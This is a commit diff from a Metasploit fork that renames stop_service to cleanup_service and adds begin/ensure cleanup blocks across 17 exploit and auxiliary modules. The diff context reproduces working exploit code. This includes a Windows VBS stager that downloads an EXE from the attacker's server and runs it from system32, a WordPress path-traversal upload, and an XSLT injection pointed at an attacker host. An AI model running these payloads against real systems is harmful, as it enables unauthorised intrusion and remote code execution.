adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Rename stop_service to cleanup_service for services that use reference counting

Browse Source
This commit is contained in:
Ashley Donaldson
2022-03-10 10:28:25 +11:00
parent 1494f804e7
commit 9761d68c19
17 changed files with 236 additions and 217 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/exploit/remote/http_server/php_include.rb
+1 -1
View File
@@ -62,7 +62,7 @@ module Exploit::Remote::HttpServer::PHPInclude
rescue ::Interrupt
raise $!
ensure
stop_service
cleanup_service
end
end
modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb
+1 -1
View File
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
end
def on_client_close(c)
stop_service
cleanup_service
end
end
modules/auxiliary/gather/safari_file_url_navigation.rb
+1 -1
View File
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Auxiliary
super
# Kill FTP
stop_service
cleanup_service
# clear my resource, deregister ref, stop/close the HTTP socket
begin
modules/auxiliary/server/ldap.rb
+1 -3
View File
@@ -39,15 +39,13 @@ class MetasploitModule < Msf::Auxiliary
end
#
# Wrapper for service execution and cleanup
# Wrapper for service execution
#
def run
start_service
service.wait
rescue Rex::BindFailed => e
print_error "Failed to bind to port #{datastore['SRVPORT']}: #{e.message}"
ensure
stop_service
end
#
modules/exploits/linux/http/vestacp_exec.rb
+7 -4
View File
@@ -239,10 +239,13 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
start_http_server
payload_implant
login
start_backup_and_trigger_payload
stop_service
begin
payload_implant
login
start_backup_and_trigger_payload
ensure
cleanup_service
end
end
def on_request_uri(cli, _request)
modules/exploits/multi/http/jboss_maindeployer.rb
+1 -1
View File
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
print_status("Shutting down the web service...")
stop_service
cleanup_service
#
modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+1 -1
View File
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
#select(nil, nil, nil, 20) unless session_created?
print_status("Shutting down the web service...")
stop_service
cleanup_service
end
# Handle incoming requests from the target
modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+2 -2
View File
@@ -166,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote
# sleep 1
# waited += 1
# if waited > datastore['HTTP_DELAY']
# stop_service
# cleanup_service
# return Exploit::CheckCode::Safe
# end
# end
#
# stop_service
# cleanup_service
# return Exploit::CheckCode::Vulnerable
# end
modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+2 -2
View File
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
wait_until { @search_received }
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
ensure
stop_service
cleanup_service
end
def build_ldap_search_response_payload
@@ -150,6 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote
wait_until { @search_received && (!handler_enabled? || session_created?) }
handler
ensure
cleanup
cleanup_service
end
end
modules/exploits/multi/misc/java_jmx_server.rb
+55 -52
View File
@@ -131,60 +131,63 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Starting service...")
start_service
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("Discovering the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
# First try to connect to the original RHOST, since the mbean address may be inaccessible
begin
connect(true, { 'RPORT' => mbean_server[:port] })
rescue Rex::ConnectionError
# If that fails, try connecting to the listed address instead
connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("Discovering the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
# First try to connect to the original RHOST, since the mbean address may be inaccessible
begin
connect(true, { 'RPORT' => mbean_server[:port] })
rescue Rex::ConnectionError
# If that fails, try connecting to the listed address instead
connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
end
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("Executing payload...")
send_jmx_invoke(
object_number: jmx_endpoint[:object_number],
uid_number: jmx_endpoint[:uid].number,
uid_time: jmx_endpoint[:uid].time,
uid_count: jmx_endpoint[:uid].count,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
disconnect
ensure
vprint_status("Stopping service...")
cleanup_service
end
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("Executing payload...")
send_jmx_invoke(
object_number: jmx_endpoint[:object_number],
uid_number: jmx_endpoint[:uid].number,
uid_time: jmx_endpoint[:uid].time,
uid_count: jmx_endpoint[:uid].count,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
disconnect
vprint_status("Stopping service...")
stop_service
end
def is_rmi?
modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+2 -2
View File
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
cleanup_service()
return
end
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("No executable sent :(")
end
stop_service()
cleanup_service()
wdmserver.close()
handler
modules/exploits/unix/dhcp/bash_environment.rb
+1 -1
View File
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
sleep 2
end
ensure
stop_service
cleanup_service
end
end
end
modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+1 -1
View File
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
sleep 2
end
ensure
stop_service
cleanup_service
end
end
end
modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+24 -22
View File
@@ -114,29 +114,31 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
start_service
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
'proxyreload' => '1'
}
}, 25)
begin
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
'proxyreload' => '1'
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
select(nil,nil,nil,20)
else
print_status("No response from the server")
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
select(nil,nil,nil,20)
else
print_status("No response from the server")
end
ensure
print_status("Shutting down the web service...")
cleanup_service
end
print_status("Shutting down the web service...")
stop_service
end
end
modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+19 -16
View File
@@ -85,25 +85,28 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Starting up web service...")
start_service
payload_uri = generate_payload_uri
vprint_status("Using URI #{payload_uri}")
begin
payload_uri = generate_payload_uri
vprint_status("Using URI #{payload_uri}")
random_file_name = rand_text_alphanumeric(rand(5) + 5)
post = {
'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
'image_url' => payload_uri,
'image_user' => rand_text_alphanumeric(rand(5) + 5),
'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
}
random_file_name = rand_text_alphanumeric(rand(5) + 5)
post = {
'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
'image_url' => payload_uri,
'image_user' => rand_text_alphanumeric(rand(5) + 5),
'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
}
print_status("Uploading payload #{random_file_name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post
})
print_status("Uploading payload #{random_file_name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post
})
stop_service
ensure
cleanup_service
end
unless res && res.code == 200 && res.headers['date']
fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")
modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+20 -13
View File
@@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => false,
'DisclosureDate' => '2017-07-20',
'DefaultOptions' => { 'WfsDelay' => 5 },
'DefaultTarget' => 0
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
@@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote
print_warning('Trying all possible KEY and IV combinations...')
print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
start_service
vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
begin
vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
test_passphrases
test_passphrases
# If no working passphrase has been found,
# wait to allow the the chance for the last one to callback.
if @passphrase.empty? && !@dry_run
sleep(wfs_delay)
end
if service
stop_service
# If no working passphrase has been found,
# wait to allow the the chance for the last one to callback.
if @passphrase.empty? && !@dry_run
sleep(wfs_delay)
end
ensure
cleanup_service
end
print "\r\n"
if !@passphrase.empty?
print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found")
end
end
end
@@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
print_good("Possible Base Key Value Found: #{key}")
else
print_good("KEY Found: #{key}")
print_good("IV Found: #{@passphrase[8..-1]}")
print_good("IV Found: #{@passphrase[8..]}")
end
vprint_status(format('Total number of Keys tried: %<n_tried>d', n_tried: i))
vprint_status(format('Time to crack: %<c_time>.3f seconds', c_time: elapsed.to_s))
@@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
@decryptor.key = key
found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
# Find all possible IVs for the first ciphertext
brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..])
# Reduce IV set by testing against other ciphertexts
cipher_texts.drop(1).each do |cipher_text|
modules/exploits/windows/novell/netiq_pum_eval.rb
+97 -94
View File
@@ -198,106 +198,109 @@ class MetasploitModule < Msf::Exploit::Remote
'Path' => resource_uri
}
})
datastore['SSL'] = true
begin
datastore['SSL'] = true
# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"#{vbs_stage}.vbs\");"
register_file_for_cleanup("#{vbs_stage}.vbs")
register_file_for_cleanup("#{exename}.exe")
identity = ""
# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"#{vbs_stage}.vbs\");"
register_file_for_cleanup("#{vbs_stage}.vbs")
register_file_for_cleanup("#{exename}.exe")
identity = ""
data = "\x00\x00\x00\x00\x00\x01"
data << "\x00\x14"
data << "SPF.Util.callModuleA"
data << "\x00\x00"
data << "\x00"
data << "\x00\x02"
data << "\x0a\x0a"
data << "\x00\x00\x00\x01\x03"
data << "\x00\x03"
data << "pkt"
data << "\x03"
data << "\x00\x06"
data << "method"
data << "\x02"
data << "\x00\x04"
data << "eval"
data << "\x00\x06"
data << "module"
data << "\x02"
data << "\x00\x08"
data << "ldapagnt"
data << "\x00\x04"
data << "Eval"
data << "\x03"
data << "\x00\x07"
data << "content"
data << "\x02"
data << [code.length + 4].pack("n")
data << code
data << "\x0a\x0a1;\x0a\x0a1;"
data << "\x00\x00\x09"
data << "\x00\x00\x09"
data << "\x00\x03"
data << "uid"
data << "\x02"
data << [identity.length].pack("n")
data << identity
data << "\x00\x00\x09"
data << "\x00\x08"
data << "svc_name"
data << "\x02"
data << [svc_name.length].pack("n")
data << svc_name
data << "\x00\x00\x09"
data = "\x00\x00\x00\x00\x00\x01"
data << "\x00\x14"
data << "SPF.Util.callModuleA"
data << "\x00\x00"
data << "\x00"
data << "\x00\x02"
data << "\x0a\x0a"
data << "\x00\x00\x00\x01\x03"
data << "\x00\x03"
data << "pkt"
data << "\x03"
data << "\x00\x06"
data << "method"
data << "\x02"
data << "\x00\x04"
data << "eval"
data << "\x00\x06"
data << "module"
data << "\x02"
data << "\x00\x08"
data << "ldapagnt"
data << "\x00\x04"
data << "Eval"
data << "\x03"
data << "\x00\x07"
data << "content"
data << "\x02"
data << [code.length + 4].pack("n")
data << code
data << "\x0a\x0a1;\x0a\x0a1;"
data << "\x00\x00\x09"
data << "\x00\x00\x09"
data << "\x00\x03"
data << "uid"
data << "\x02"
data << [identity.length].pack("n")
data << identity
data << "\x00\x00\x09"
data << "\x00\x08"
data << "svc_name"
data << "\x02"
data << [svc_name.length].pack("n")
data << svc_name
data << "\x00\x00\x09"
print_status("Sending the eval code request...")
print_status("Sending the eval code request...")
res = send_request_cgi(
{
'uri' => '/',
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-amf",
'headers' => {
"x-flash-version" => "11,4,402,278"
},
'data' => data,
}
)
res = send_request_cgi(
{
'uri' => '/',
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-amf",
'headers' => {
"x-flash-version" => "11,4,402,278"
},
'data' => data,
}
)
if res
fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
else
print_good("There wasn't a response, but this is the expected behavior...")
end
# wait for the data to be sent
print_status("Waiting for the victim to request the EXE payload...")
waited = 0
while (not @exe_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
if res
fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
else
print_good("There wasn't a response, but this is the expected behavior...")
end
# wait for the data to be sent
print_status("Waiting for the victim to request the EXE payload...")
waited = 0
while (not @exe_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
end
end
print_status("Giving time to the payload to execute...")
select(nil, nil, nil, 20)
ensure
print_status("Shutting down the web service...")
cleanup_service
end
print_status("Giving time to the payload to execute...")
select(nil, nil, nil, 20)
print_status("Shutting down the web service...")
stop_service
end
end